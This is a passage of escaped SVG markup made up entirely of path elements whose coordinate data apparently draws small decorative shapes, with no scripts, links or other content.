d=\"M739.6,13.7c1-.1,1.7-.2,1.7-.4,1.1.4,3.7.8,5,1.2-.5-.4-3-.9-5.5-1.5a.08.08,0,0,1,.1.08v0a34.18,34.18,0,0,0-3.5-.3C738.5,13.1,736.3,13.5,739.6,13.7Z\"></path>\n        <path d=\"M527.9,101.5c4.5.1,11.5.6,13,.5-5.8-.3-12.8-1.1-6.8-1.4-4.7-.2-.8.3-5.5.1.3-.1,1.8-.2,1-.4a31,31,0,0,0,4.2.1c-1.9-.4,2-.2,2.4-.4-8.4-.3-4,.6-13.7.2-5.8.7-1,1.9-1.3,3-.1.3-.7.6-2.2.9,2.2.3,2.9.1,4.4.3-4.5.1.1.4-2.1.7a41.51,41.51,0,0,1,6,.5c-2.8-.1-1.5.3-5.5.1-2.5-.1-.4-.5-3.3-.6.8.3-3.8.5-.8.6a98.06,98.06,0,0,1,10,.3c3.9-.6-.1-1.3-4.5-2,.1.1-1,.1-1.4,0,2.7.1,1.9-.2,3-.2h1c2.8.2,2.4.6,4.8.8a21.29,21.29,0,0,1,4.3.1c-5.7-1.4.5-1.9-8.1-2.9-.1.1.5.3-1.1.3C525.6,101.8,526,101.6,527.9,101.5Z\"></path>\n        <path d=\"M732.3,103.2c-.7.3,4.1.3,3.3.6-6.8-.1-2.6.5-6.4.6,6.2-.1-.9.3.6.7,8.9-.4,4.4-1.6,7.7-2.3C729.7,102.6,738.3,103.3,732.3,103.2Z\"></path>\n        <path d=\"M526,99.3c-2.3.1-8.6.3-5,.7C519.7,99.4,528.4,99.9,526,99.3Z\"></path>\n        <path d=\"M524.2,94.1c4.2,0,1.8-.7,4.8-.9,8.1.5,10.1,1.7,1.6,1.8-1.4-.3,1.7-.2.9-.5-4.9,0-5.7,1.1,1.2,1.3-.8-.8,6.3-.8,10.1-1.2-1.7-.1-4-.1-4.4-.2,7.2.2.4-.4,5.2-.4-2,.2,5.1.4,4.3.2-3.4-.1-3.5-.4-6-.6,1.2.3-2.7.1-4,.2.2-.2-2.1-.3-3.1-.4,5.3-.1,7.5,0,9.4-.3-4.6-.2-4.2.1-7.1-.2,1.9.5-4.6.2-5.2.4l-.3-.3c-1.9,0-3.8-.1-5.7-.1C528.3,93.5,521.8,93.8,524.2,94.1Z\"></path>\n        <path d=\"M536.7,95.7c2.9-.1,4.8-.3,6.5-.5C537.2,94.9,535.1,95.6,536.7,95.7Z\"></path>\n        <path d=\"M734.1,99c3.5.1,2.9-.1,7,0C740.5,98.1,739.3,98.7,734.1,99Z\"></path>\n        <path d=\"M519,89.8c8,.1.4-1.1-2.6-1.4-.6.2-6.7.7-3.7.6,2.4,0,2-.4,5.3-.3C515.9,89.2,521.6,89.4,519,89.8Z\"></path>\n        <path d=\"M652.2,86.4c-1.3-.9-6.3-2.1-1-2.8-5.1,0-2.2.2-5.8-.2,2.4.7-11.4,1.2-3.7,2.1-1.7,0-4-.1-4.2,0,6.1.1,1,.4-1,.4,2.8.6-.4,1.4-1,2.1,3.4-.1,7.1.4,7.1.2-2-.1-1.8-.3-3.1-.4,8.8.2,6.5-.2,12.5,0-6.6-.3,1.6-1.2-5.2-1.2C646.8,86.3,651.5,86.5,652.2,86.4Z\"></path>\n        <path d=\"M609.4,72.5c4.1.1,11.6,1,3.2.5.3.4,6.8.4,8.9.6-.5-.4-3.6-.6-4.9-.9C615.6,73.2,611.9,72.1,609.4,72.5Z\"></path>\n        <path d=\"M603.1,63.8a15.43,15.43,0,0,1-2.8-.1,64,64,0,0,0,7.8.9C606.2,64.4,607.1,63.9,603.1,63.8Z\"></path>\n        <path d=\"M601.6,63.6c-1.4-.3,7.4.3,2.7,0a6.88,6.88,0,0,1-1.5-.1c-.1-.1,2.4,0,2.6-.2C602,62.8,597.5,63.4,601.6,63.6Z\"></path>\n        <path d=\"M599.9,60.1c-8.5-.4,4.4-.8-3.9-1.3-2.1.7-4.2,1.6-4.6,2.7C598.8,61.3,592.5,60.3,599.9,60.1Z\"></path>\n        <path d=\"M754.7,60.9c2-.7,3.2-1.4,3.6-2.2-4.6-.1-1.6-.7-7.6-.7C760.3,58.7,749.6,59.9,754.7,60.9Z\"></path>\n        <path d=\"M598.3,55.2c4.7-.2,2.4-.6,7.6-.8-9.4.2,4.6-.4-6.2-.7C598.3,54.6,597,54.4,598.3,55.2Z\"></path>\n        <path d=\"M601,53.5c0-.2,4.6,0,3.9-.2-1.1-.1-2.8-.1-2.9-.2,2.1,0,5.3.2,5.6,0-3.9-.3,3.8-.7-2.2-.9,2.3.1,3.7-.1,1.2-.2a19.08,19.08,0,0,1-4,.1c.2.3,2.7.4,2,.7-4.1,0-.6.2-5.4.2C603.1,53,596,53.3,601,53.5Z\"></path>\n        <path d=\"M600,49.2c9,.1.5.9,6.4,1-.7-.3,0-.4,2.6-.2,0-.6,1.8-.5-3.4-.7.6-.5,3.2-.2,5.2-.4-2.3,0-9.8-.6-7.3-.4C607.4,48.9,602.5,49.1,600,49.2Z\"></path>\n        <path d=\"M643.7,37.3c-.2-.2.5-.2,1.1-.3-5.2-.1-10.6-.6-17-.4,1.5.2,1,.6,3.4.7,1.3-.4.4-.5,3.6-.7C634.5,37.1,643.4,36.9,643.7,37.3Z\"></path>\n        <path d=\"M686.7,26.1a14.19,14.19,0,0,1-3.9.3c-.1-.1-.3-.1-1.5-.1a8.94,8.94,0,0,0,3.2.5C682.1,26.4,692.6,26.6,686.7,26.1Z\"></path>\n        <path d=\"M722.6,95.4a28.18,28.18,0,0,0-7.5-.6c-.2.2,2.1.3,3.1.4-5.8-.1-12.8.2-6.4.6-9,.4-16.9,1.3-11.5,2.7-3.4.5-11.3,1.3-5.1,2.1-5,0-.7.8-3.3,1,1.7.1,3.4.1,3,.3-7.9,1.3-2.1,3-8.6,4.4,7.5.2,1.7.8,5.1,1.1.7-.4,4.7-.5,6.2-.8-1.7-.1-4-.1-4.3-.2a29.54,29.54,0,0,1,5.4-.2c4.4,0,1,.6,6.1.6-13.3-2.2,18.3-2.7,6.9-4.8a20.06,20.06,0,0,0,4.1-.1c-8-.6,5-1-2.7-1.5,7.2.2,3.1-.8,1.9-1,9.2-.5,1.1-1.8,7.5-2.6-2-.2-2.2-.4-4.7-.5,6.4.2,4.4-.2-.1-.1-.1-.2-.6-.4-1.8-.5,4.5,0,4.6.3,7.1.2C724.3,95.5,715.8,95.3,722.6,95.4Z\"></path>\n        <path d=\"M750.3,110.5c-2.7-.3-.9.9.5,1.1C750.9,111.2,751.8,111.1,750.3,110.5Z\"></path>\n        <path d=\"M770.6,108.3a42.59,42.59,0,0,0-7.2-1c4.7,1.1,1.7,1.7,5.2,2.9-.6-.5-.5-.8,2.8-.3C770.3,109,769.1,108.7,770.6,108.3Z\"></path>\n        <path d=\"M766.9,104.6c1.4.3,2.1.5,4.2.8.8,0,1.2-.1.8-.4C769,104.6,769.1,104.9,766.9,104.6Z\"></path>\n        <path d=\"M768.1,103c.7.6-1,1,3.8,1.8C771.2,104.4,774.4,104.3,768.1,103Z\"></path>\n        <path d=\"M745.3,93.6c-4.8-1-3.5,0-.8.4C744.1,93.7,744.5,93.6,745.3,93.6Z\"></path>\n        <path d=\"M768.6,95.7c-1.8-.1-.3.6,1.4,1C769.3,96.3,770.9,96.1,768.6,95.7Z\"></path>\n        <path d=\"M914.7,118.4c0,.8-1.8-.5-5.3-1a21.54,21.54,0,0,0,4.5,1.4,5.88,5.88,0,0,1,2,.2C915.7,118.9,916.1,118.7,914.7,118.4Z\"></path>\n        <path d=\"M745.2,89.2c-3.3-.6-3.5-.3-3.9-.1a9.76,9.76,0,0,0,3.4,1.1c.7-.2-1.8-.6-2.4-.9a21,21,0,0,0,4.1.5C745.2,89.5,745.2,89.4,745.2,89.2Z\"></path>\n        <path d=\"M753.7,82.5c-.1-.4-3.3-.5-2.4-.9,3.1.7,2.8-.7-1.7-1.5-.1.5-1.2.5,1.6,1.3-8.4.1-9.5,2.2-5.5,4.9-2.2-.2-2.2.1-3.9,0,3.2,1.2-3.7,1.5,3.2,2.8-1.9-1.3,1.5-2.2,1.2-3.6-.1-.6-2.8-1.8,1.3-1.3-.2.1-1.4,0-.8.3,6.6,1-.3-.9,2.7-.6.6.5,2.9.6,1.3.8,2.8.5,2.6.2,2.9,0-1.8-.5-2.5-1.3-.5-1.1-2.2-.5-1.3-.2-4.2-.7.7.4.7,1.2-2.8.2,5.1.6-.2-1,2.5-.8a24.35,24.35,0,0,0,4.3.9c-.8-.6-.1-.4-3.4-1.1C751,82,754.4,83.1,753.7,82.5Z\"></path>\n        <path d=\"M919.6,106.2c-2.8,1.6-6.4,2.3-6.4,4.9,1.7.4,4.5,1,5.5,1.4-5.8-1.2-.7.8-6.1-.6-.6.4-.8.8,1.7,1.6-1.1-.7,2.6.2,4.1.6-.2-.2.1-.3.8-.3-1.7-.5-4.5-.9-5.4-1.1,1.2-.2,3.5.2,7,.5-2.2-.8.2-.5.6-.8-6-1-.7-.9-3.7-1.7,1.3.2,1.4.1,3.1.4-1.6-.6-.5-.8.5-1-1.3-.3-2.4-.5-3.3-.8,5.3-.4,2-2.2,5.6-2.5l-2.1-.3A12.12,12.12,0,0,0,919.6,106.2Z\"></path>\n        <path d=\"M929.1,114.2c-2.7-.4-4-.5-4-.2,2,.3,2.3.5,1.2.4,1,.2,2.1.3,3.1.5C928.3,114.4,928.3,114.4,929.1,114.2Z\"></path>\n        <path d=\"M925.7,110.9c1,.6-1,.4-.6.8C929.6,112.6,928.9,111.5,925.7,110.9Z\"></path>\n        <path d=\"M925.4,106.1c-3.8-1-8.8-.7-4.9,0C920.5,105.6,922.4,105.7,925.4,106.1Z\"></path>\n        <path d=\"M888,100.6c-.3-.4,3.5-.3.5-1C889.5,100.2,884.6,99.8,888,100.6Z\"></path>\n        <path d=\"M646.5,59.9c1,.2,2.1.3,3.1.5.3-.2,2.1-.3-1.4-.9C647.8,59.7,645.8,59.4,646.5,59.9Z\"></path>\n        <path d=\"M911,102.4c-.1.3.6.7,2.4,1.1C912.7,103.1,914.8,102.9,911,102.4Z\"></path>\n        <path d=\"M920.4,101.6c7.6,1.3.7-.6,3.6-.6C918,100.1,922.6,101.5,920.4,101.6Z\"></path>\n        <path d=\"M954.4,106.1c-.9-.1-1.9.4.4.8C955.8,107,956.7,106.6,954.4,106.1Z\"></path>\n        <path d=\"M934.9,101.7a10.32,10.32,0,0,1,2.2.5c-.8-.1-1.2-.1-.9.1,2.8.5,2.6.2,2.9,0C936.4,101.8,935.7,101.5,934.9,101.7Z\"></path>\n        <path d=\"M926.5,98.2c-4.7-.7-.6,1.2-6.9-.3,1.9,1,3,1.3.8,1.7,4.7.8,3.4.1,4.8,0C920.3,98.5,929.4,99.4,926.5,98.2Z\"></path>\n        <path d=\"M906,95.6c-2.6-.8.1-.6-4.5-1.4C901.8,94.6,902.5,95.1,906,95.6Z\"></path>\n        <path d=\"M921.7,98.1c.8-.2,3.5-.1-.5-1C922,97.6,918.5,97.4,921.7,98.1Z\"></path>\n        <path d=\"M956.7,102.7c1.6.1,3.4,0-1.3-.8C956.1,102.2,954.5,102.4,956.7,102.7Z\"></path>\n        <path d=\"M929.9,97.1c1.1.4.6.7,2.4,1.1C933.8,98.2,933.8,97.6,929.9,97.1Z\"></path>\n        <path d=\"M955,99.1c-2.7-.5-3.9-.1-1.8.4C953.8,99.4,955.7,99.6,955,99.1Z\"></path>\n        <path d=\"M822.7,76.8c1.6,0,1.1.8,3.5,1.2-1.1-.6,1.3-.4.5-.9C824.2,76.8,820,76,822.7,76.8Z\"></path>\n        <path d=\"M954.7,98.3a7.45,7.45,0,0,1-2-.1,5.75,5.75,0,0,0,2.3.8C955.2,98.9,956.1,98.7,954.7,98.3Z\"></path>\n        <path d=\"M907.2,89.8c-1.4-.6,1.5,0,1.9-.1-2.5-.6-4.3-.4-7.2-.9C904.3,89.2,905.9,89.5,907.2,89.8Z\"></path>\n        <path d=\"M946.5,95.4c-.7.2,1.8.6,3.4,1C951.2,96.2,950.4,95.8,946.5,95.4Z\"></path>\n        <path d=\"M907.6,88.8c-.4.3-1.7-.5-3.2-.6a14.05,14.05,0,0,1-2.9,0,56,56,0,0,1,6.3,1.2C906.8,88.9,910.8,89.4,907.6,88.8Z\"></path>\n        <path d=\"M887.5,85.1c-1.8-.3-3.3-.6-4.3-.8a5.13,5.13,0,0,0,2.4,1.1C884.7,84.8,887.2,85.3,887.5,85.1Z\"></path>\n        <path d=\"M890.7,83.5c-2.2-.3-2.1-1.1-3.4-1,2.5.9-8.7-1.2-3.9,0C885.2,82.5,888,83.4,890.7,83.5Z\"></path>\n        <path d=\"M897.9,84.4c-1.9-.2-4.7-.6-5-.4C896.3,84.6,897.8,84.7,897.9,84.4Z\"></path>\n        <path d=\"M1056.2,110.9c2.9.5,2.9.2,2.9-.1C1055.8,110.2,1055.9,110.5,1056.2,110.9Z\"></path>\n        <path d=\"M893.1,82.5a17.84,17.84,0,0,1-3.3-.8c1,.6-1.2,1,2.8,1.8C893.1,83.1,891.9,82.8,893.1,82.5Z\"></path>\n        <path d=\"M923.4,87.3c-.4.3-5.3-.1.5,1C922.2,87.6,926.4,88,923.4,87.3Z\"></path>\n        <path d=\"M930.9,84.8c1,.5-2.8-.2-1.8.3,1.1.2,2.1.3,3.1.5C931.6,85.1,934.5,85.5,930.9,84.8Z\"></path>\n        <path d=\"M918.5,82.9c.3-1,1.3-.9,3-1.8-5.3-.9-5.7-.8-1.8.3-2-.4-2.2-.2-4.1-.6C919.4,81.8,914,82.1,918.5,82.9Z\"></path>\n        <path d=\"M918.3,80.5c4.8.8,3.8,0,4.7-.3C919,79.6,919.6,80.3,918.3,80.5Z\"></path>\n        <path d=\"M722.2,46.1c-4.1-.8-1.3,1.2-.5,1C721.8,46.5,721.5,46.4,722.2,46.1Z\"></path>\n        <path d=\"M945,81.8a13,13,0,0,1-3.1-.4c3.8,1,1.2,1.1,4.8,1.9C945.9,82.8,947.5,82.4,945,81.8Z\"></path>\n        <path d=\"M890.7,73.1c-3-.6-2.6-.3-5.2-.8-.2-.2-.4-.3-2.2-.6C882.7,72.2,890.6,73.5,890.7,73.1Z\"></path>\n        <path d=\"M1009.7,91.9c-.1.2-3,.4,1.5,1.1C1010.4,92.6,1012.1,92.4,1009.7,91.9Z\"></path>\n        <path d=\"M936.2,79.4c1.9.8-5.4-.9-5.1-.5,3.1.6,2.3.9,4.5,1.4C934.7,79.8,940.1,80.4,936.2,79.4Z\"></path>\n        <path d=\"M741.9,46.7c-2.8-.4-4.4.5-1.5,1C740.5,47.2,741.8,47.1,741.9,46.7Z\"></path>\n        <path d=\"M1001.9,89.8c-3.8-.9-1.6-.9-4.6-1.5.1.6,2.4,1.3,3.8,2C1000.1,89.8,1002.5,90.2,1001.9,89.8Z\"></path>\n        <path d=\"M940.9,79.1c-.4.2-1.8.4.6,1.2C941.6,80.2,943.5,79.9,940.9,79.1Z\"></path>\n        <path d=\"M935.5,77.9c-1.8-.3-3.3-.6-4.3-.8-.6.4,2.3.9,2.6,1.3-1.5-.3-1.9-.5-3.3-.8a.35.35,0,0,0,.1.2c-.7-.1-1.2-.2-1-.1,3.3.5,1.6.6,4.4,1.1,2.7,0,.4-.5-.5-1.2A13.6,13.6,0,0,0,935.5,77.9Z\"></path>\n        <path d=\"M924.6,77.3c.2-.3,2.1-.8-.7-1.6C923.6,76.2,920.8,76.2,924.6,77.3Z\"></path>\n        <path d=\"M764.7,49.9c.6-.2-3.8-1.3-5.4-1.2,1.9.3,2.5.5,2.3.7C762.6,49.6,763.6,49.7,764.7,49.9Z\"></path>\n        <path d=\"M751.3,46.1c-2.5-.3-4.5-1.1-5.2-.9,1.6.4,3,1,1.4.9l2.1.3c.6.1,1.2.2,1,.1C746.7,45.7,753.5,46.9,751.3,46.1Z\"></path>\n        <path d=\"M1049.1,95.4c-2.4-.4-4-.7-5.2-.8.2.2,0,.3,1.2.5C1044.4,94.8,1050.3,96.1,1049.1,95.4Z\"></path>\n        <path d=\"M891.8,69.4c-2.5-.7-5.2-.7-7.4-1.3C884,68.5,889.8,69.2,891.8,69.4Z\"></path>\n        <path d=\"M941.8,76.9c3.4,0,1.5.6,4.4,1.1.2-.5-1-1-5.6-1.7C940.8,76.5,940.4,76.6,941.8,76.9Z\"></path>\n        <path d=\"M890.2,65.8c-5.8-.7-6.1,0-4.5.8,3.3.4,3.3-.2,5.8,0-3.5-.9-2.2,0-4-.2a8.44,8.44,0,0,0-1.2-.4C887.4,65.8,890.4,66.2,890.2,65.8Z\"></path>\n        <path d=\"M1005.1,86.2c3.3.6,2.2,0,6.2.8-.2-.2.1-.3.8-.3C1009.3,86.4,1006.9,86.3,1005.1,86.2Z\"></path>\n        <path d=\"M895.6,67.1c0,.1-.1.1-1-.1,0-.2-1-.4-2.3-.7.7.4-.9.6,1.4,1-.1-.1-.1-.2-.2-.4C895.9,67.5,898.6,67.7,895.6,67.1Z\"></path>\n        <path d=\"M749.3,41.8c.1.4-3.3.4.5,1.1C749.3,42.5,752.4,42.5,749.3,41.8Z\"></path>\n        <path d=\"M887.3,63.9a13,13,0,0,1-3.1-.4c-1,.4,3,1.1,4.6,1.7C889.6,65.1,889,64.3,887.3,63.9Z\"></path>\n        <path d=\"M1130.5,104.1c1.3.2,1.5.4,3.2.6-.4-.3,1.3,0,1.9,0A21.88,21.88,0,0,0,1130.5,104.1Z\"></path>\n        <path d=\"M779.9,45.1c3.5.6,5.6.3,1.8-.4C780.2,44.6,781.3,45.2,779.9,45.1Z\"></path>\n        <path d=\"M971.3,76.1c-1,0-4.7-.1-.7.7a5.88,5.88,0,0,1,2,.2C968.9,76,974.2,76.9,971.3,76.1Z\"></path>\n        <path d=\"M892.3,62.1c-4.3-.7-8.6-.3-4.6.6-.8-.4.2-.4,3,.2C886.9,61.8,895.8,63.1,892.3,62.1Z\"></path>\n        <path d=\"M1084.6,94.9c2.7.2,2.5-.4-1.5-1.1C1084.3,94.3,1081.9,94.3,1084.6,94.9Z\"></path>\n        <path d=\"M1051.7,88.7l-2.1-.3c-.6-.1-1.2-.2-1-.1,3.5.6-2.9,0,2.3.8C1049.9,88.6,1052.3,89,1051.7,88.7Z\"></path>\n        <path d=\"M897.1,61.9c2.5.4.9.6-.8.3-1.1-.3-1.9-.6-3.3-1,.3.3-2,.4,1.5,1.1,1.1-.5,1.5.6,5.3,1C900.7,63.4,901,62.3,897.1,61.9Z\"></path>\n        <path d=\"M1045.7,86.2c.3.3-.7.2-3-.2,0,.1.2.8,1.3.7C1042.4,86,1050.5,87.4,1045.7,86.2Z\"></path>\n        <path d=\"M1027.2,83.8a20.39,20.39,0,0,1,2.2.6c.5-.2,3.6-.1-.4-.8C1030.1,84.1,1028.3,83.9,1027.2,83.8Z\"></path>\n        <path d=\"M1008.3,78.7c-.3.2-2.9-.3-1.8.3a21.3,21.3,0,0,0,4.2.7c.2.2.1.4,2.3.7l-.3-.6C1009.4,79.3,1010.4,79.1,1008.3,78.7Z\"></path>\n        <path d=\"M769.3,36.9c1.4-.2-3.6-.7-3.3-.9,4.7.6-2.5-.9,1.8-.4-2-.3-2.4-.5-4.3-.8.3.9,2.5,1.9-1.1,1.8,3.3.8,1.3,1.4,4.9,2.3.1-.5,1.3-1-.9-1.9,1.1-.1,4.5,1,4.1.5C768.1,37,765.1,35.9,769.3,36.9Z\"></path>\n        <path d=\"M898.2,60.1l-5.2-.9c0,.3-1.8,0,1.3.7C894.2,59.6,898.2,60.4,898.2,60.1Z\"></path>\n        <path d=\"M856.5,51.7c1.3.6-2,0-2.9.1a17.84,17.84,0,0,1,3.3.8C857.9,52.6,858.8,52.2,856.5,51.7Z\"></path>\n        <path d=\"M795,42.2c-3-.7-.8-1.1-4.8-1.9C791.1,40.8,790.1,41.2,795,42.2Z\"></path>\n        <path d=\"M836.8,48.8c-.7-.5,2.7.2,2.9-.1-1.4-.2-2.3-.4-3.2-.6C837.7,48.6,833.5,48.1,836.8,48.8Z\"></path>\n        <path d=\"M911,60.6c-.3.2-4-.6-2.9,0C911.4,61.2,913.8,61.2,911,60.6Z\"></path>\n        <path d=\"M747.2,33.1a5.88,5.88,0,0,1-2-.2c0,.3.8.6,2.4,1C746.2,33.3,750.4,33.8,747.2,33.1Z\"></path>\n        <path d=\"M760.1,35.8c-.1-.4-1.2-.8-3.5-1.2,0,.2-3.4-.5-3-.2C756.3,34.9,756.9,35.3,760.1,35.8Z\"></path>\n        <path d=\"M1052.6,84.4c-.1-.2-.1-.3-.2-.5-2-.3-4.5-.7-4-.3,1.8.3,2.6.3,3.2.5C1051.6,84.2,1051.7,84.2,1052.6,84.4Z\"></path>\n        <path d=\"M889.9,57c-1.1-.5,2.6.2,2.9,0a28.82,28.82,0,0,1-4.3-.9C887.9,56.2,887.7,56.4,889.9,57Z\"></path>\n        <path d=\"M842.5,48.7c1.7.3.7.4,2.3.7-1.7-.7,5.7.6,1.8-.3C847.5,49.6,841.6,48.3,842.5,48.7Z\"></path>\n        <path d=\"M792.2,40.4c1.4-.4,3-1.3-2.2-2.6-3.1-.2,2.2,1.1,1.6,1.4a19.06,19.06,0,0,0-3.1-.4C792.8,39.5,789.2,39.7,792.2,40.4Z\"></path>\n        <path d=\"M893.8,56.9c0-.3,1.7-.2,1.7-.5C892.6,55.9,891.5,56.4,893.8,56.9Z\"></path>\n        <path d=\"M823.4,45.1c.5-.2,2.4.1,1.7-.4C822.8,44.4,819.8,44.5,823.4,45.1Z\"></path>\n        <path d=\"M772.8,36.3c1.3-.1.9-.5-2.5-1.2C770.4,35.4,771.1,35.8,772.8,36.3Z\"></path>\n        <path d=\"M1149.9,97.9c.7.4,1.2.8,4.5,1.3C1154.5,98.8,1152.9,98.4,1149.9,97.9Z\"></path>\n        <path d=\"M768.8,33.8c.8-.3-5.4-1.3-5.3-1C766.4,33.2,766.3,33.4,768.8,33.8Z\"></path>\n        <path d=\"M788,35.4c1.5.3,1.9.5,3.3.8-1.7-.8-1.4-1-2.7-1.7C788.6,34.9,787,34.8,788,35.4Z\"></path>\n        <path d=\"M757.2,29.7a24.5,24.5,0,0,0,3.5,1.2C760.6,30.5,760.9,30.2,757.2,29.7Z\"></path>\n        <path d=\"M822.2,40.4c3.2.5,4.3-.1,1.5-.9C824.5,40.1,819.4,39.6,822.2,40.4Z\"></path>\n        <path d=\"M792.7,35.2c3.8.6,4-.2-.5-1A7.77,7.77,0,0,1,792.7,35.2Z\"></path>\n        <path d=\"M771.3,30.8c-2.5-.4-2.5-.8-4.4-1.2,1,.7,1.1,1.4,5.9,2.3C773.3,31.5,766.8,30.3,771.3,30.8Z\"></path>\n        <path d=\"M755.5,28.2c2.7.2-2.4-1.1.5-.9-2.8-.4-2.2-.6-4.3-.9C753.8,27.2,751.7,27.1,755.5,28.2Z\"></path>\n        <path d=\"M769.3,28.7c-3.3-.6-1.8.1-3.9-.1,2.5.4,1.2.7,3.4,1.1a5.85,5.85,0,0,1,2,.2c-2.2-.9.8.1,1.9-.1C769.8,29,767.5,28.9,769.3,28.7Z\"></path>\n        <path d=\"M894.1,49.3c-3.4-.7-2.9.4.4.8C895.2,49.9,891.9,49.2,894.1,49.3Z\"></path>\n        <path d=\"M1097.3,82.7a4.69,4.69,0,0,0,2.5,1.3c-.6-.4,1.8.1.8-.4C1096.4,82.9,1101.5,83.4,1097.3,82.7Z\"></path>\n        <path d=\"M833,38.6c-.4.1-3.3-.4-1.9.1,1.2.2,3,.5,3.2.6s0,.3,1.2.5C836.9,39.8,834.7,39.2,833,38.6Z\"></path>\n        <path d=\"M768.9,27.8c-1,0-2-.1-3-.2.2-.2-.5-.5-2.3-.8-.4.3,2.5.9.3.7,2,.3,2.4.5,4.3.8C766.3,27.7,772.4,28.6,768.9,27.8Z\"></path>\n        <path d=\"M773.8,28c-.8.1-4.2-.6-2.9.1,1.6.2,3.9.7,4.1.6a10.32,10.32,0,0,1-2.2-.5C772.8,28,777.4,28.7,773.8,28Z\"></path>\n        <path d=\"M756.1,25.3c.2-.2,3.1.3,4,.2-2.4-.4-4-.7-5.2-.8C755.1,24.9,754.9,25,756.1,25.3Z\"></path>\n        <path d=\"M775.5,27.5c-.2.2-3.8-.5-4-.3,3.8.5,1.9.7,5.4,1.2C776.2,28.1,777.9,27.9,775.5,27.5Z\"></path>\n        <path d=\"M800.7,31.7c-5.5-1.1-2.1.5.2.5C798.3,31.7,800.5,31.7,800.7,31.7Z\"></path>\n        <path d=\"M767,25.8c.4.3,9,1.8,5.2.9,0,.1-.1.1-1-.1-.2-.2,0-.3-1.2-.5C770.1,26.3,767.2,25.7,767,25.8Z\"></path>\n        <path d=\"M798.2,30.4c-4.8-.6-3.8-.4-6.4-1.3-.3.3-.2.4-2.8.2,3.2.7,4.3.7,7.5,1.5,1.1,0,1.1-.1-.2-.5C797.5,30.4,798.7,30.6,798.2,30.4Z\"></path>\n        <path d=\"M775,26.4c-3.3-.6-4.2-.6-5.1-.5,1.8.3,3.3.6,4.3.8C773.9,26.4,775.3,26.6,775,26.4Z\"></path>\n        <path d=\"M868.2,41.4c-.6.3,5.7,1.5,6.5,1.4C872.5,42.4,870.4,41.9,868.2,41.4Z\"></path>\n        <path d=\"M1213.9,98.1c-.4.2-2.2.4,1.4,1C1214.6,98.7,1216.3,98.5,1213.9,98.1Z\"></path>\n        <path d=\"M1148.4,86.3c-1.6-.1-.9.7,2.5,1.3A7.85,7.85,0,0,0,1148.4,86.3Z\"></path>\n        <path d=\"M1152.3,82.2c-1.8,1.1-9.7,2-4.9,4.1,4.7,0,9.5-.3,3.7-2.5,1.9,0,2.6.8,4.2.7C1151.7,83.3,1155.1,82.7,1152.3,82.2Z\"></path>\n        <path d=\"M911.4,47c-.8-.4.1-.3,1.2-.2s2.4.3,2.7.3a22.5,22.5,0,0,0-2.7-.5C910,46.2,907.8,46.3,911.4,47Z\"></path>\n        <path d=\"M860.1,36.5a5.77,5.77,0,0,0-2.3,1.2c2.7.4,4,.5,4,.2C857.7,37.1,863.6,37.4,860.1,36.5Z\"></path>\n        <path d=\"M756.2,19.3c-1.5-.1-6.4-.6-2.8.3C752,18.9,759.3,20,756.2,19.3Z\"></path>\n        <path d=\"M842,33.1c5.8,1.3,3.8,1.5,5.8,2.1.2-.2,4.9.8,4,.2-4.6-.6-3-.9-4.5-1.4C844.1,33.5,845.3,33.7,842,33.1Z\"></path>\n        <path d=\"M850.7,35c1.5.3,1.9.5,3.2.8-1.7-.8-.4-.7.5-1C851.1,34.2,850.1,34.4,850.7,35Z\"></path>\n        <path d=\"M1133.4,81.1c-4.5-.8-3.3,0,.3.6Z\"></path>\n        <path d=\"M890,40.4c-2.4-.1,1.4.8,3.5,1.2C894.2,41.3,891.5,40.8,890,40.4Z\"></path>\n        <path d=\"M820.8,29a41.32,41.32,0,0,0-5.2-.8c1.7.3.7.4,2.3.7.1-.1-.4-.4.9-.2S821,29.3,820.8,29Z\"></path>\n        <path d=\"M851.3,34.3c1.7.1.1-1-2.4-1.1C852.2,33.9,846.6,33.5,851.3,34.3Z\"></path>\n        <path d=\"M741.7,15.1c.2.2-.7.1-2-.2.7.3-.9.5,1.4.9C739.4,15.1,745.5,16,741.7,15.1Z\"></path>\n        <path d=\"M912.7,44.2c1.7.2,2-.1.1-.5h-.1c-.4.1-2-.1-1.7.2C911.6,44,912.2,44.1,912.7,44.2Z\"></path>\n        <path d=\"M755.6,15.7c-3.7-.6-3.3-.9-6.5-1.4,3.3.9,1.6,1.2,4.8,1.9C752.3,15.5,755.3,16,755.6,15.7Z\"></path>\n        <path d=\"M862.3,32.9c1.5.6-5.3-.2.4.8C861.7,33.3,865.6,33.6,862.3,32.9Z\"></path>\n        <path d=\"M909.2,40.2a5.13,5.13,0,0,0,2.4,1.1c1.2-.1-.3-.2.8-.4Z\"></path>\n        <path d=\"M855.6,31a5,5,0,0,0-2.3-.8c-.5.1-2,0-2.9.1a28.64,28.64,0,0,1,3.2.6C853.7,30.8,853.8,30.7,855.6,31Z\"></path>\n        <path d=\"M735,11.1c3.4.6,5,.7,5,.4A22,22,0,0,0,735,11.1Z\"></path>\n        <path d=\"M1217.9,88c-.1-.3-.7-.8.7-.7C1214.2,86.6,1215.8,87.4,1217.9,88Z\"></path>\n        <path d=\"M893.1,32.6c-.3-.4.5-.7-2.5-1.2C890.7,31.8,891.4,32.1,893.1,32.6Z\"></path>\n        <path d=\"M885,29.7c.6.6-3.4-.5-5.2-.8-.5.1-2,0-2.9.1,3.2.2,10.4,1.6,12.3,1.5C887.4,30.2,886,29.9,885,29.7Z\"></path>\n        <path d=\"M891.9,29.9c-1-.7-5.4-1.8-.6-1.2-3.1-.7-8.5-1.5-10.7-2.1a.35.35,0,0,0,.1.2c3.1.6,5.9,1.3,7.6,1.8C884.4,28.1,889.4,29.4,891.9,29.9Z\"></path>\n        <path d=\"M860.4,24.6c3.2.7,4.3.2,1.8-.3C861.8,24.5,859.3,24,860.4,24.6Z\"></path>\n        <path d=\"M1216.1,82c.9.7-.5.8,2.6,1.4C1218.6,83,1218.2,82.5,1216.1,82Z\"></path>\n        <path d=\"M872.3,25.2c-1.5-.4,0-.7-3.5-1.2C869,24.3,869,24.7,872.3,25.2Z\"></path>\n        <path d=\"M861.4,22.8c-1.8-.3-3.3-.6-4.3-.8a19.44,19.44,0,0,0,5.5,1.5C861.2,23.1,861.6,23,861.4,22.8Z\"></path>\n        <path d=\"M872.3,23.1c-2.3-.3-3.6-.4-4-.2,1.4.2,2.3.4,3.2.6C870.5,23.1,872.8,23.5,872.3,23.1Z\"></path>\n        <path 